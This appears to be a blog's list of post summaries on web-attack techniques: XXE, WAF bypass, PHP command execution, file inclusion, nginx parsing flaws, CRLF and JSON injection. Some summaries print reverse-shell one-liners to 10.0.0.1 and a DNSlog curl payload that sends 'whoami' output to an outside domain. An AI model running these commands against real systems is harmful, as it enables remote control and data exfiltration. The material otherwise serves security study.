摘要: XXE 有回显利用方式总结 结合外部实体声明(实体名称 SYSTEM ”uri/url“)和参数实体(% 实体名称 SYSTEM “uri-外部dtd”)有两种方式进行注入攻击 姿势一 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <! 阅读全文
posted @ 2023-02-26 21:55 幻-心 阅读(45) 评论(0) 推荐(0)
摘要: 安全狗Bypass No.1 内联注释(/*![12345]*/)绕过方法: /*!select*/: 相当于没有注释 /*!12345select*/: 当12345小于当前mysql版本号的时候,注释不生效,当大于版本号的时候注释生效。 /*![]*/: []中括号中的数字若填写则必须是5位 1 阅读全文
posted @ 2023-02-26 21:55 幻-心 阅读(47) 评论(0) 推荐(0)
摘要: 命令执行函数 system() passthru() exec() shell_exec() `反引号` ob_start() mail函数+LD_PRELOAD执行系统命令 system("whoami"); passthru("whoami"); exec("whoami"); shell_ex 阅读全文
posted @ 2023-02-26 21:54 幻-心 阅读(33) 评论(0) 推荐(0)
摘要: **条件:**开启fopen 和 include lallow_url_include 是否允许引用URL文件 lallow_url_fopen 是否允许打开URL文件 **危害:**利用远程文件包含漏洞,可以直接执行任意命令。 **注意:在****php.ini中,allow_url_fopen默 阅读全文
posted @ 2023-02-26 21:54 幻-心 阅读(211) 评论(0) 推荐(0)
摘要: nginx nginx <8.03 空字节代码执行漏洞 影响版本:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37 上传图片马然后这样访问: hack.jpg%00.php 就会执行PHP代码 nginx 1.6.2 http://www.test.com/1.txt/ 阅读全文
posted @ 2023-02-26 21:54 幻-心 阅读(33) 评论(0) 推荐(0)
摘要: CRLF注入原理: 一个HTTP请求报文由四个部分组成:请求行、请求头部、空行、请求数据。 请求行和请求头的尾部都有CRLF标志,请求头和请求体之间也是通过CRLF标志分割的。 CRLF注入漏洞就是利用Http的这种报文结构,向请求行或请求头的字段注入恶意的CRLF,就能注入一些首部字段或报文主体( 阅读全文
posted @ 2023-02-26 21:53 幻-心 阅读(636) 评论(0) 推荐(0)
摘要: /bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 /bin/sh -i >& /dev/tcp/10.0.0.1/8080 0>&1 perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_ 阅读全文
posted @ 2023-02-26 21:49 幻-心 阅读(28) 评论(0) 推荐(0)
摘要: JSON注入原理: JSON注入是指应用程序所解析的JSON数据来源于不可信赖的数据源,程序没有对这些不可信赖的数据进行验证、过滤,如果应用程序使用未经验证的输入构造 JSON,则可以更改 JSON 数据的语义。在相对理想的情况下,攻击者可能会插入无关的元素,导致应用程序在解析 JSON数据时抛出异 阅读全文
posted @ 2023-02-26 21:43 幻-心 阅读(241) 评论(0) 推荐(0)
摘要: 1.原理 通过恶意payload组合的三级域名后对服务器发起的DNS请求。 2.利用场景 SQL注入 RCE(远程命令执行) SSRF(服务端请求伪造) RFI(远程文件包含) 3.Payload example curl http://huanxin.ceye.io/`whoami` ping ` 阅读全文
posted @ 2023-02-26 21:38 幻-心 阅读(94) 评论(0) 推荐(0)